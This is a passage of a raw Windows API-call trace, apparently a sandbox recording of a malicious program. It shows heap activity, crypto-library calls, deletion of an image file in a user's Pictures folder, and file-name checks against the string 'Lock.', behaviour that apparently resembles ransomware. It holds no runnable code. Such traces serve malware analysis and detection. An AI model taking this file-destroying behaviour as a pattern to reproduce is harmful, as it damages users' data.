hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0250.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0250.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.249] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.327] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0250.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0250.328] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0250.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0250.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.328] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0250.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.328] FreeLibrary (hLibModule=0x756e0000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.328] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0250.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0250.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0250.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0250.329] CloseHandle (hObject=0x2a0) returned 1 [0250.330] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0250.330] CloseHandle (hObject=0x2d0) returned 1 [0250.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.334] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.335] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.335] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/MYUszCBAPCzmXXDSG.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png", lpFilePart=0x8cedf4*="MYUszCBAPCzmXXDSG.png") returned 0x2e [0250.335] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myuszcbapczmxxdsg.png")) returned 0x20 [0250.335] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ffad60, ftCreationTime.dwHighDateTime=0x1d5ebe5, ftLastAccessTime.dwLowDateTime=0x78d18b70, ftLastAccessTime.dwHighDateTime=0x1d5f056, ftLastWriteTime.dwLowDateTime=0x78d18b70, ftLastWriteTime.dwHighDateTime=0x1d5f056, nFileSizeHigh=0x0, nFileSizeLow=0x6f77, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MYUszCBAPCzmXXDSG.png", cAlternateFileName="MYUSZC~1.PNG")) returned 0xa87110 [0250.336] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myuszcbapczmxxdsg.png")) returned 1 [0250.378] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ffad60, ftCreationTime.dwHighDateTime=0x1d5ebe5, ftLastAccessTime.dwLowDateTime=0x78d18b70, ftLastAccessTime.dwHighDateTime=0x1d5f056, ftLastWriteTime.dwLowDateTime=0x78d18b70, ftLastWriteTime.dwHighDateTime=0x1d5f056, nFileSizeHigh=0x0, nFileSizeLow=0x6f77, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MYUszCBAPCzmXXDSG.png", cAlternateFileName="MYUSZC~1.PNG")) returned 0 [0250.378] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0250.379] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0250.379] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0250.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e58910 [0250.380] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/MYUszCBAPCzmXXDSG.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png", lpFilePart=0x8cf650*="MYUszCBAPCzmXXDSG.png") returned 0x2e [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0250.380] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\MYUszCBAPCzmXXDSG.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myuszcbapczmxxdsg.png")) returned 0xffffffff [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0250.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0250.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.381] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0250.381] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.381] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0250.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ndo_wHdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="do_wHdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_wHdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wHdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wHdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HdmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dmDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mDfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fLw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lw8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AJ.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0250.383] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0250.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e56098 [0250.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 